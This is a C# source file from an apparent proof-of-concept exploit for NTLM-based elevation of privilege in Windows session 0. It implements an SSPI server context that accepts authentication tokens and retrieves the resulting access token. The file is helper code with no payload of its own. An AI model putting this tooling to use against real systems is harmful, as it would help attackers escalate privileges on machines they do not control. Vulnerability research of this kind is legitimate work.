﻿using NtApiDotNet;
using System;

namespace PoC_NtlmAuthSession0_EoP
{
    class ServerContext : IDisposable
    {
        private readonly CredentialsHandle _creds;
        private readonly SecHandle _context;

        public byte[] Token { get; private set; }
        public bool Done { get; private set; }

        public NtToken GetAccessToken()
        {
            Win32NativeMethods.QuerySecurityContextToken(_context, out SafeKernelObjectHandle token).CheckResult();
            return NtToken.FromHandle(token);
        }

        public ServerContext(CredentialsHandle creds, byte[] token)
        {
            _creds = creds;
            _context = new SecHandle();
            Done = GenServerContext(true, token);
        }

        public void Continue(byte[] token)
        {
            Done = GenServerContext(false, token);
        }

        private bool GenServerContext(
            bool new_context, byte[] token)
        {
            using (DisposableList list = new DisposableList())
            {
                SecBuffer out_sec_buffer = list.AddResource(new SecBuffer(SecBufferType.TOKEN, 8192));
                SecBufferDesc out_buffer_desc = list.AddResource(new SecBufferDesc(out_sec_buffer));
                SecBuffer in_sec_buffer = list.AddResource(new SecBuffer(SecBufferType.TOKEN, token));
                SecBufferDesc in_buffer_desc = list.AddResource(new SecBufferDesc(in_sec_buffer));

                SecStatusCode result = Win32NativeMethods.AcceptSecurityContext(_creds, new_context ? null : _context,
                    in_buffer_desc, 0, SecDataRep.Native, _context, out_buffer_desc, out int context_attr, null).CheckResult();

                if (result == SecStatusCode.CompleteNeeded || result == SecStatusCode.CompleteAndContinue)
                {
                    Win32NativeMethods.CompleteAuthToken(_context, out_buffer_desc).CheckResult();
                }

                Token = out_buffer_desc.ToArray()[0].ToArray();
                Console.WriteLine(Win32NativeMethods.BuildHexDump(Token));
                return !(result == SecStatusCode.ContinueNeeded || result == SecStatusCode.CompleteAndContinue);
            }
        }

        void IDisposable.Dispose()
        {
            Win32NativeMethods.DeleteSecurityContext(_context);
        }
    }
}
